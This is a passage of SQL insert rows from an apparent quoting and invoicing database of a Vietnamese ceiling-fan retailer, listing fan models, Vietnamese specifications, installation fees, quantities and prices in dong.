(789, 159, 'estimate', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', 'Sải cánh 132cm (52inch) <br />\r\nĐộng cơ DC, công suất 36W   <br />\r\nĐiều khiển 6 cấp độ    <br />\r\nMàu sắc: Vân Gỗ (KOA) <br />\r\nĐèn LED 12W, ánh sáng 3000K <br />\r\nThương hiệu: Mountain Air/China', 1.00, 5800000.00, '', 1, 25, '', 0.00),
(790, 253, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', 'Sải cánh 132cm (52inch) <br />\r\nĐộng cơ DC, công suất 36W   <br />\r\nĐiều khiển 6 cấp độ    <br />\r\nMàu sắc: Vân Gỗ (KOA) <br />\r\nĐèn LED 12W, ánh sáng 3000K <br />\r\nThương hiệu: Mountain Air/China', 1.00, 5800000.00, '', 1, 25, NULL, 0.00),
(791, 254, 'invoice', 'Quạt trần Mountain Air 3039', 'Sải cánh 132cm <br />\r\nĐộng cơ AC, 3 tốc độ  <br />\r\nCông suất 75W <br />\r\n5 cánh lá, chất liệu nhựa', 1.00, 6800000.00, '', 1, 43, 'https://hgphome.com/uploads/items/1966/thumb_52YOF-3039.jpg', 0.00),
(792, 254, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 350000.00, '', 2, 0, 'https://hgphome.com/uploads/items/1793/thumb_dieu-khien-hop-so-ac.jpg', 0.00),
(794, 255, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)', 2.00, 6800000.00, 'Cái', 1, 20, 'https://hgphome.com/uploads/items/1942/thumb_abacus-crm_img.jpg', 0.00),
(795, 255, 'invoice', 'Ống ty treo quạt trần\r\nĐộ dài 50cm', 'Ống ty treo quạt trần nhà ở, chung cư', 2.00, 550000.00, 'cây', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(796, 160, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Matte White <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 6300000.00, 'cái', 1, 25, '', 0.00),
(797, 160, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Trần tấm thạch cao: Phí lắp đặt gia cố móc', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(798, 161, 'estimate', 'Phí di dời quạt', '', 2.00, 500000.00, '', 1, 0, '', 0.00),
(799, 161, 'estimate', 'Phí quản lý thi công', 'Chi phí đi lại', 2.00, 150000.00, '', 2, 0, '', 0.00),
(800, 162, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Trắng <br />\r\nMàu cánh: Trắng<br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan', 1.00, 6500000.00, '', 1, 25, '', 0.00),
(801, 256, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Trắng <br />\r\nMàu cánh: Trắng<br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan', 1.00, 6500000.00, '', 1, 25, NULL, 0.00),
(802, 257, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Matte White <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, 'cái', 1, 25, NULL, 0.00),
(804, 163, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 1, 30, '', 0.00),
(805, 163, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(806, 258, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 1, 30, NULL, 0.00),
(807, 258, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(808, 259, 'invoice', 'Phí di dời quạt', '', 2.00, 500000.00, '', 1, 0, NULL, 0.00),
(809, 259, 'invoice', 'Phí quản lý thi công', 'Chi phí đi lại', 2.00, 150000.00, '', 2, 0, NULL, 0.00),
(812, 164, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 2.00, 16300000.00, '', 1, 20, NULL, 0.00),
(813, 164, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt trần thép - ngoài ban công', 2.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(816, 165, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 152cm ( ~ 60inch)    <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    <br />\r\nMàu thân quạt: White (Kẽm mạ INOX)    <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)    <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 25, '', 0.00),
(817, 165, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(818, 166, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 3.00, 350000.00, 'cái', 1, 0, '', 0.00),
(819, 167, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S   <br />\r\nProduct Name: POWERFUL SERIES 10   <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor, <br />\r\nSpeed (min/max): 10 / 50 RPM   <br />\r\nWeight: 120.86 kg   <br />\r\nMaximum Rated Current : 8.3 A   <br />\r\nPower consumption (max W): 1,050 W <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz   <br />\r\nFan Weight (trọng lượng): 120.86 kg <br />\r\nSound at max. Speed (độ ồn): ˜46 dB(A)   <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h)    <br />\r\nMax Affected Area: 2,612 m2   <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color  <br />\r\nColor: Airfoil:Silver , Winglet: Black     <br />\r\nMounting components: 1m Extension tube length <br />\r\nController: Knob Wall Controller mounted   <br />\r\nFan Diameter: 24ft (7.3m)   <br />\r\nBảo hành (Warranty): 03 years   <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 3.00, 130000000.00, '', 1, 0, '', 0.00),
(820, 260, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 3.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(821, 168, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 6500000.00, 'cái', 1, 25, '', 0.00),
(822, 168, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 500000.00, '', 2, 0, '', 0.00),
(823, 261, 'invoice', 'Bộ đèn LED Quạt trần SINO White', 'Gồm: Nắp chụp đèn và     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K', 1.00, 750000.00, 'bộ', 1, 0, NULL, 0.00),
(824, 261, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Gồm Remote control và Controler', 1.00, 750000.00, 'bộ', 2, 0, NULL, 0.00),
(825, 169, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm<br />\r\n- Đã bao gồm chi phí nhân công lắp đặt trần thạch cao, không bao gồm nguồn điện, xe nâng', 1.00, 4875000.00, 'cái', 1, 0, '', 0.00),
(827, 169, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Tính thêm chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >40 cm', 1.00, 625000.00, 'cái', 2, 0, '', 0.00),
(828, 262, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4875000.00, 'cái', 1, 0, NULL, 0.00),
(829, 262, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí gia cố khoảng cách từ trần thạch cao lên trần bê tông >30 cm', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(830, 170, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m', 'Model: BCNF1CB288A-01S<br />\r\nMotor: BLDC Direct Drive Motor, IP rated: IP55, <br />\r\nAirfoil material: Aluminium<br />\r\nSpeed (min/max): 10 / 65 RPM<br />\r\nRated current (min/max):0.24 / 8.3 A<br />\r\nPower consumption (min/max): 15.8 / 585 W<br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz<br />\r\nFan Weight (trọng lượng): 104.03 kg<br />\r\nSound at max. Speed (độ ồn): &lt;46 dB(A)<br />\r\nMax Affected Area: 15,960 ft 2 / 1,483 m2 <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color<br />\r\nColor: Airfoil:Silver , Winglet: Black<br />\r\nMounting options: I-Beam, Extension tube: 1m<br />\r\nNumber of fan speeds: Potentiometer<br />\r\nController: Knob Wall Controller mounted<br />\r\nFan Diameter: 18ft (5.5m)<br />\r\nWarranty: 03 years<br />\r\nThương hiệu: SUNON - Made in Taiwan<br />\r\n', 1.00, 97750000.00, '', 1, 0, '', 0.00),
(832, 263, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m5', 'Model: BCNF1CB288A-01S<br />\r\nMotor: BLDC Direct Drive Motor, IP rated: IP55, <br />\r\nAirfoil material: Aluminium<br />\r\nSpeed (min/max): 10 / 65 RPM<br />\r\nRated current (min/max):0.24 / 8.3 A<br />\r\nPower consumption (min/max): 15.8 / 585 W<br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz<br />\r\nFan Weight (trọng lượng): 104.03 kg<br />\r\nSound at max. Speed (độ ồn): &lt;46 dB(A)<br />\r\nMax Affected Area: 15,960 ft 2 / 1,483 m2 <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color<br />\r\nColor: Airfoil:Silver , Winglet: Black<br />\r\nMounting options: I-Beam, Extension tube: 1m<br />\r\nNumber of fan speeds: Potentiometer<br />\r\nController: Knob Wall Controller mounted<br />\r\nFan Diameter: 18ft (5.5m)<br />\r\nWarranty: 03 years<br />\r\nThương hiệu: SUNON - Made in Taiwan', 1.00, 97750000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1802/thumb_ps10_7300.jpg', 0.00),
(833, 263, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 900000.00, 'lô', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(834, 171, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White<br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 4875000.00, 'cái', 1, 0, '', 0.00),
(835, 171, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(836, 264, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: White<br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 4875000.00, 'cái', 1, 0, NULL, 0.00),
(837, 264, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(838, 172, 'estimate', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 500000.00, '', 1, 0, '', 0.00),
(839, 265, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(840, 173, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m', 'Đường kính cánh: 6.5 ft (2 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 33800000.00, '', 1, 0, '', 0.00),
(841, 174, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, '', 0.00),
(842, 266, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(843, 267, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển quạt CAVANI<br />\r\nLED', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(844, 267, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(845, 175, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển quạt CAVANI LED', 1.00, 750000.00, '', 1, 0, '', 0.00),
(846, 175, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 2, 0, '', 0.00),
(847, 176, 'estimate', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 3.00, 6500000.00, 'cái', 1, 0, '', 0.00),
(849, 176, 'estimate', 'Thi công lắp đặt đường dây điện cấp nguồn quạt', '', 3.00, 800000.00, 'cái', 2, 0, '', 0.00),
(850, 176, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 3.00, 850000.00, 'cái', 3, 0, '', 0.00),
(851, 268, 'invoice', 'Haiku L 44 inch White', 'Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Trắng  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 3.00, 18500000.00, 'bộ', 1, 15, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(852, 268, 'invoice', 'Bộ đèn LED Haiku L series', 'Độ sáng 16 cấp điều chỉnh dimmable<br />\r\nÁnh sáng: 2700K<br />\r\nCông suất 16.3W<br />\r\nBộ đèn chỉ dùng cho quạt Haiku L series', 3.00, 3600000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(853, 268, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 3.00, 350000.00, 'cái', 3, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(854, 269, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 3.00, 6500000.00, 'cái', 1, 20, NULL, 0.00),
(855, 269, 'invoice', 'Thi công lắp đặt đường dây điện cấp nguồn quạt', '', 3.00, 800000.00, 'cái', 2, 0, NULL, 0.00),
(856, 269, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 3.00, 850000.00, 'cái', 3, 0, NULL, 0.00),
(857, 177, 'estimate', 'Haiku L 44 inch Black', 'Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Black  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 18500000.00, '', 1, 20, '', 0.00),
(858, 177, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông, nhôm, tôn', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(859, 269, 'invoice', 'Phí quản lý thi công', 'Phí quản lí làm việc giới hạn: 7h - 10h ', 1.00, 1200000.00, 'lô', 4, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(861, 179, 'estimate', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, 15800000.00, 'cái', 1, 0, '', 0.00),
(862, 270, 'invoice', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, 15800000.00, 'cái', 1, 15, NULL, 0.00),
(864, 271, 'invoice', 'Haiku I 60 inch White with SenseME', 'Model: <br />\r\nSải cánh: 150cm (60 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA', 1.00, 36900000.00, '', 1, 15, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(865, 179, 'estimate', 'Nhân công lắp đặt trần bê tông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(866, 178, 'estimate', 'Nhân công lắp đặt trần bê tông', '', 1.00, 500000.00, 'cái', 1, 0, '', 0.00),
(867, 178, 'estimate', 'Haiku I 60 inch White with SenseME', 'Model: <br />\r\nSải cánh: 150cm (60 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA', 1.00, 36900000.00, '', 2, 15, '', 0.00),
(868, 270, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(869, 271, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(870, 272, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 500000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(871, 272, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 6300000.00, '', 2, 30, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(872, 273, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 152cm ( ~ 60inch)    <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W    <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)    <br />\r\nMàu thân quạt: White (Kẽm mạ INOX)    <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)    <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 25, NULL, 0.00),
(873, 273, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(874, 180, 'estimate', 'Ống ty treo quạt trần', 'Ống ty INOX 2m', 1.00, 500000.00, 'cây', 1, 0, '', 0.00),
(875, 274, 'invoice', 'Ống ty treo quạt trần', 'Ống ty INOX 2m', 1.00, 500000.00, 'cây', 1, 0, NULL, 0.00),
